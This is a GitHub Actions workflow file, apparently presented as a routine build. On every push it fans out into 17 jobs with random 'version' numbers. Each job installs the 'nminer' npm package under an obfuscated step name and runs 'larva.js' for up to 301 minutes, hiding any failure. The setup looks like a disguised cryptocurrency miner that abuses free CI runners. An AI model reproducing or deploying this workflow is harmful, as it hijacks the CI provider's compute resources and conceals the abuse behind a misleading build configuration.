name: larva
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3103 }
          - { version: 9068 }
          - { version: 6598 }
          - { version: 35 }
          - { version: 65 }
          - { version: 9277 }
          - { version: 1037 }
          - { version: 3515 }
          - { version: 6700 }
          - { version: 9285 }
          - { version: 5750 }
          - { version: 9618 }
          - { version: 8202 }
          - { version: 911 }
          - { version: 4254 }
          - { version: 2575 }
          - { version: 4677 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: easily haze opposite
        run: |
          npm install nminer@latest
          timeout 301m node larva.js || echo "larva executed"